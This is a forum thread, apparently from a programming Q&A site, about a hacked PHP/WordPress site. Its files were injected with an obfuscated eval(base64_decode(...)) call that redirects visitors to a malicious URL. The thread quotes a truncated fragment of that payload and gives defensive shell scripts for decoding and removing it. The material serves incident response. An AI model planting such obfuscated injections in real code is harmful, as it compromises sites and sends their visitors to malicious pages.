
Recently I noticed that a jQuery Mobile / PHP website I had created was not loading. When I checked the related PHP files, I could see that some extra characters had gone into the code. The extraneous characters were showing up soon after the <?php tag. What is the reason for it? Is my website hacked? How will I recover all my files? The files are being accessed via a control panel login. I could even see that files outside the website folder, some WP files (wp-config.php, wp-blog-header.php etc.), also contained those extra characters.

This is the malicious code found - <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVI

Someone out there, please advise.

Here is the full code

eval(base64_decode("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"));

2 Answers


To answer the direct question: yes, your site has been hacked.

The eval(base64_decode(....)) is intended to disguise the nature of the code being executed, but it can't disguise the fact that there is code in your PHP files that does not belong there.

As for what the hacked code does, I'm unable to answer that, as you haven't provided all of it.

I also can't answer any question as to how they might have got in, but the likelihood is that somewhere in your system (or in your web hosting company's system) there is a software package which has a known security flaw.

In most cases, this flaw will have been fixed by the providers of that software, but the version on the hacked site won't have been updated with the latest fixes, thus giving the hackers an opportunity to get in.

There are other methods to break into a site, but this is by far the most likely.

I can't tell you which software was used to hack your site; there are too many variables involved, and I don't know enough about it. I can advise you to make sure that all the software you are responsible for is secure and running the latest versions, and to check with your hosting company to make sure they're fully up-to-date as well.

You haven't mentioned Wordpress by name, but the files you've specified sound like they belong to Wordpress. Therefore, recovering the files should be simply a case of updating them back to the original Wordpress versions. However, as I say, you should make sure you update to the latest WP version, because it sounds like the version you've got is out of date and vulnerable.

The actual data in your pages may have been compromised, but from the nature of the hack described, it sounds more like a PHP injection hack, so I would expect that if you get the WP files back to their original state, your pages will be restored. You should check thoroughly, however, to make sure there isn't anything unexpected still lurking in there.

[EDIT] Now we have the full code, it's easy to see what it's doing: copy the code into a small PHP program, and replace eval with print, so you can see what is being run, rather than actually running it. The answer is that it checks that the user isn't a googlebot or similar, and if not, it redirects the page to a malicious URL.

SDC
  • Thanks for the reply. If it is a case of PHP injection, does it result from poor coding or from a security issue with the hosting company? The malicious eval(base64_decode(....)) has got into almost all files (even across other project folders) lying within the cPanel. So will contacting the hosting company help me? –  Sep 25 '12 at 17:22
  • @sarikav.f - sorry for the delay. As I said, it's impossible to be sure at this point what the route of entry was for the hacker. There may be logs that can help with that, but it'll take time to go through them all. Your hosting company may be able to help with that (depending on how responsive they are), but your first move should be to make sure that all your software is up-to-date, so that for example, if it was a wordpress hack that was the problem, then it won't happen again. – SDC Sep 26 '12 at 13:30
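SDC's "replace eval with print" trick works, but the decoded string can be read without going anywhere near a PHP interpreter. The following shell script is an added example, not code from the question or from SDC's answer: it pulls the quoted base64 string out of an injected eval(base64_decode("...")) call with grep and sed, and hands it to base64(1) to decode. The infected file it inspects is constructed inside the script as a harmless stand-in for the real payload; the function and variable names are the example's own.

```shell
#!/bin/sh
# Added example (not from the question or the answer): read the PHP hidden
# inside an injected eval(base64_decode("...")) call without executing it.
# The sample file and its payload are constructed below for the demo.

# Print the decoded PHP source of the first eval(base64_decode("...")) call
# found in file $1. Nothing is executed: grep/sed extract the quoted string,
# base64 -d turns it back into readable text. Returns 1 if no call is found.
decode_injected_payload() {
    encoded=$(grep -o 'eval(base64_decode("[A-Za-z0-9+/=]*"))' "$1" \
        | head -n 1 \
        | sed 's/^eval(base64_decode("//; s/"))$//')
    if [ -z "$encoded" ]; then
        echo "no eval(base64_decode(...)) call found in $1" >&2
        return 1
    fi
    printf '%s' "$encoded" | base64 -d
}

# Constructed sample payload: stands in for the attacker's real code.
SAMPLE_PAYLOAD='error_reporting(0); echo "constructed sample payload";'

# Write a file shaped like the infected ones in the question: the injected
# call sits on the same line as the opening <?php tag, original code follows.
make_sample_infected_file() {
    enc=$(printf '%s' "$SAMPLE_PAYLOAD" | base64 | tr -d '\n')
    printf '<?php eval(base64_decode("%s"));\n\n// original file contents\necho "hello";\n' \
        "$enc" > "$1"
}

# Demo run against a temporary constructed file.
sample=$(mktemp)
make_sample_infected_file "$sample"
echo "decoded payload from $sample:"
decode_injected_payload "$sample"
echo
rm -f "$sample"
```

Run against a real file with decode_injected_payload /path/to/index.php and read the output as text. The truncated string quoted in the question decodes to a block that starts with error_reporting(0); and a check on headers_sent() before looking at HTTP_REFERER, which is consistent with the user-agent check and redirect that SDC describes.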

This is a common problem on old installations of WordPress and other old CMS, especially those that use an old version of timthumb to dynamically manipulate images.

Someone injected that code into the top of probably most of your .PHP files (at least those that open with a blank line of <?php). This happened to me several months ago.

The eval() code is basically "encrypting" malicious PHP code and running it (evaluating it) when the PHP file opens. It's impossible to determine what the code does without seeing the full base64 string (and decoding it) but if it's anything like the injection that happened to me, it's appending some JavaScript code to your site to redirect the visitor to a malicious page, or otherwise alter link behavior within your website.

You need to find the hole that led to this, and close it. If it's an outdated version of WordPress, upgrade. Check your access logs for suspicious POST queries.

The only way I know to fix this is to remove the PHP code from every PHP file on your box. There are Linux bash commands and advanced text editors you can use to remove the code from multiple files, if it's identical in each file. If not, grab the files, Notepad and a heaping cup of coffee :)

Patrick Moore
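As an added example of the "Linux bash commands" Patrick mentions (this is not code from his answer or from the question), the script below lists every .php file under a directory whose first line carries an injected eval(base64_decode("...")) call after the opening <?php tag, keeps a .bak copy of each one, and strips only that call so the original code is left intact. The sample tree it builds is constructed for the demo; INJECT_RE, list_infected_php, strip_injected_eval, clean_tree and make_sample_tree are the example's own names. It handles only the pattern shown in the question (call on the same line as the tag); a different injection needs a different pattern.

```shell
#!/bin/sh
# Added example (not from the question or the answer): find and strip an
# injected eval(base64_decode("...")) call from the first line of PHP files.
# Only the injected call is removed; the <?php tag and the rest of each file
# stay as they were, and a .bak copy is kept before any file is touched.

# Shape of the injected call as it appears in the question (basic regex).
INJECT_RE='eval(base64_decode("[A-Za-z0-9+/=]*"));'

# Print the path of every .php file under $1 whose first line carries the call.
list_infected_php() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        head -n 1 "$f" | grep -q "$INJECT_RE" && printf '%s\n' "$f"
    done
}

# Back up file $1 to $1.bak, then rewrite $1 with the call removed from line 1.
# Writing through '>' keeps the original file's permissions and ownership.
# '|' is used as the sed delimiter because INJECT_RE contains '/'.
strip_injected_eval() {
    cp -p "$1" "$1.bak"
    sed "1s| *$INJECT_RE *||" "$1.bak" > "$1"
}

# Clean every infected file under $1, reporting each one.
clean_tree() {
    list_infected_php "$1" | while IFS= read -r f; do
        strip_injected_eval "$f"
        printf 'cleaned: %s\n' "$f"
    done
}

# Constructed sample tree: two infected files and one clean one. The base64
# string "QUJD" is just "ABC"; it stands in for the real payload.
make_sample_tree() {
    mkdir -p "$1/sub"
    printf '<?php eval(base64_decode("QUJD"));\nclass Foo {}\n' > "$1/a.php"
    printf '<?php\n// nothing injected here\n' > "$1/sub/clean.php"
    printf '<?php eval(base64_decode("QUJD"));\necho 1;\n' > "$1/sub/b.php"
}

# Demo run against a temporary constructed tree.
root=$(mktemp -d)
make_sample_tree "$root"
echo "infected before cleaning:"
list_infected_php "$root"
clean_tree "$root"
echo "infected after cleaning: $(list_infected_php "$root" | wc -l | tr -d ' ')"
rm -rf "$root"
```

Run list_infected_php first and read the list before running clean_tree on a real site, and diff a few cleaned files against their .bak copies to confirm only the injected call went. Keeping the backups also preserves evidence if the hosting company wants to look at the files. As Patrick says, this only removes the symptom; the outdated software that let the code in still has to be updated.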